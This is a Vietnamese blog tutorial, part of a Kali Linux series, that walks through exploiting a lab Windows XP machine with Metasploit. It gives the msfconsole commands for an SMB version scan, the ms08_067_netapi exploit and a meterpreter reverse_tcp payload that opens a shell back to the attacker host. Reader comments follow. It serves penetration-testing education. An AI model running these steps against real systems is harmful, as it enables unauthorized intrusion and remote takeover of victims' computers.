Sử dụng Kali Linux để pentest phần 3: Thực hành tấn công Windows XP bằng Metasploit - Thekalitools.com

Tuesday, March 21, 2017

Sử dụng Kali Linux để pentest phần 3: Thực hành tấn công Windows XP bằng Metasploit

Mở đầu:

Ở bài trước mình đã nêu những bước cơ bản để sử dụng Metasploit khai thác một lỗi bảo mật. Còn bây giờ ta sẽ thực hành trên lab, sử dụng lỗ hỏng ms08_067_netapi và payload meterpreter để khai thác vào Windows XP.
Còn tuổi nào cho Windows XP.

Những máy ảo cần sử dụng trong bài này gồm:

Video Demo: 

Video Demo Exploit.

Bắt đầu thực hành:

Đầu tiên bạn hãy khởi động Metasloit lên, rồi dùng use để chọn exploit.

Chọn exploit và thiết lập tham số:

Trước tiên thì ta hãy dùng quét phiên bản windows cũng qua lỗ hỏng smb.
msf > use auxiliary/scanner/smb/smb_version
smb_version
smb_version
Xem các thiết lập cần thiết cho exploit này.
msf auxiliary(smb_version) > show options
Bạn nhìn thấy, yêu cầu tham số RHOSTS phải có (cột Requiredyes), và cột Current Setting còn trống vì vậy ta phải thiết lập cho nó. Mục tiêu tấn công của ta là máy ảo Windows XP, vì vậy hãy điền IP của nó vào.
msf auxiliary(smb_version) > set RHOSTS 172.16.100.5
set RHOSTS
smb_version > set RHOSTS
Và bắt đầu quét:
msf auxiliary(smb_version) > exploit
exploit smb_version
exploit smb_version
Vậy là ta đã có được phiên bản hệ điều hành của mục tiêu: Windows XP SP0 / 1 (language:English).

Sử dụng exploit ms08_067_netapi:

Tiếp theo ta sẽ thực hiện tấn công qua exploit ms08_067_netapi:
msf auxiliary(smb_version) > use exploit/windows/smb/ms08_067_netapi
ms08_067_netapi
ms08_067_netapi
Xem các tham số cần thiết cho exploit này:
msf exploit(ms08_067_netapi) > show options
Tham số RHOST được yêu cầu chính là địa chỉ của mục tiêu:
msf exploit(ms08_067_netapi) > set RHOST 172.16.100.5
ms08_067_netapi > set RHOST
ms08_067_netapi > set RHOST

Chọn payload và thiết lập tham số:

Sau khi thiếp lập xong hãy kiểm tra lại, và chọn một payload. Mình sẽ sử dụng payload meterpreter/reverse_tcp:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Thiết lập tham số LHOST là máy đang chạy Metasploit.
msf exploit(ms08_067_netapi) > set LHOST 172.16.100.2
ms08_067_netapi > set LHOST
ms08_067_netapi > set LHOST 

Xác định mục tiêu tấn công:

msf exploit(ms08_067_netapi) > show targets
ms08_067_netapi > show target
ms08_067_netapi > show target
Ở trên ta không tìm thấy cái tùy chọn đúng như phiên bản hệ điều hành có được ở rên, tuy nhiên có cái lựa chọn Windows XP SP0/SP1 Universal là gần giống, vậy ta cứ để Automatic Targeting:
msf exploit(ms08_067_netapi) > set target 0

Bắt đầu cho chạy exploit:

msf exploit(ms08_067_netapi) > exploit
ms08_067_netapi > exploit
ms08_067_netapi > exploit
Sau khi exploit thành công, Metasploit sẽ chạy payload được chọn, và lúc này là meterpreter shell, mình sẽ hướng dẫn sử dụng payload này ở phần sau, ta hãy thử vài lệnh nào!

Thử sử dụng payload:

Các bạn hãy xem phần 4 - Hướng dẫn sử dụng Meterpreter payload.

Kiểm tra các session đang chạy:

Để xem lại các session đang mở ta hãy gõ:
msf exploit(ms08_067_netapi) > sessions
ms08_067_netapi > sessions
ms08_067_netapi > sessions

Mở lại session:

Các thông tin của session sẽ được hiển thị ra, muốn truy cập lại vào session nào thì ta hãy dùng lệnh:
msf exploit(ms08_067_netapi) > sessions -i <ID>

Thoát ra:

Và cuối cùng tắt session hay thoát khỏi Metasploit ta dùng exit nhé.
exit metasploit

Lời kết:

Qua bài này ta đã hiểu rõ hơn về cách mà Metasploit hoạt động, từ đó ta có thể dễ dàng tìm hiểu thêm về các exploit và payload khác để thực hiện tấn công. Ở bài viết tiếp theo của series này mình sẽ hướng dẫn về payload meterpreter để sử dụng điều khiển và chiếm quyền hệ thống của mục tiêu.

8 comments:

  1. Ad ơi . trường hợp Window SP0 bắt phải active win mới vào được ? thì phải làm thế nào

    ReplyDelete
  2. Thì tìm cách active thôi bạn :D

    ReplyDelete
  3. Mình dùng lệnh exploit mà không tìm được phiên bản windows

    ReplyDelete
  4. Xin hỏi tại sao đến bước set target 0 rồi exploit thì dòng cuối báo không có session nào được tạo.

    ReplyDelete
  5. Nguyện Bùi Đức: Bài viết mang tính chất minh họa, đâu phải lúc nào cũng giống y đúc như thế bạn.

    ReplyDelete
  6. Mình làm được rồi nhưng các máy SP3 thì không được mặc dù vẫn ping được. Và một số máy SP2 vẫn không được ạ.

    ReplyDelete
  7. tuy thoi nhe ban. co khi ban nang cap win xp cua ban nen no da va roi nen k the exploit duoc

    ReplyDelete
  8. ad đã thử làm với window 10 chưa b?

    ReplyDelete